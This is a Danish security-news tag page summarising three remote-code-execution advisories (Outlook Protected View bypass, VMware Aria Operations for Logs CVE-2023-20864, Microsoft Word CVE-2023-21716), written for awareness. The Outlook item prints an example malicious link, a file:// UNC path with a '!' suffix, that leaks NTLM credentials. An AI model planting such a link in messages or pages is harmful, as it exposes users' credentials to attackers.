RCE-fejl

Kritisk sårbarhed i flere Microsoft Outlook produkter

En ondsindet aktør kan eksempelvis udforme nedenstående link, som omgår Protected View Protocol, hvilket kan fører til indsigt i fortrolige NTLM-legitimationsoplysninger for en lokal bruger og dermed til at udføre et RCE angreb.

KUN EKSEMPEL: *<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*

Følgende systemer er berørt af sårbarheden:

Dansk

VMware advarer om aktiv udnyttelse af kritisk fejl i VMware Aria Operations for Logs der muliggør RCE (Remote Code Execution)

Sårbarheden CVE-2023-20864 (CVE - CVE-2023-20864 (mitre.org)) er en deserialiseringssvaghed, der blev rettet i april. Sårbarheden gør det muligt for uautoriserede angribere at foretage RCE (Remote Code Execution) på ikke-patchede systemer.

REC gør det muligt at køre vilkårlig kode som root og kræver ikke brugerinteraktion.

Dansk

PoC til udnyttelse af sårbarhed i Microsoft Word tilgængelig

Der er udgivet en PoC-exploit til en kritisk sårbarhed i Microsoft Word. Det skriver Helpnet Security. Sårbarheden har id’et CVE-2023-21716 og er en remote code execution-sårbarhed med en CVSS-score på 9,8.

Rettelser til fejlen blev udgivet i forbindelse med Patch Tuesday i februar, efter at en researcher havde fundet og afrapporteret den i november.  Den kan udnyttes, når brugeren ’previewer’ et specielt udformet RTF-dokument.

Dansk
Keywords: 
Abonnér på RSS - RCE-fejl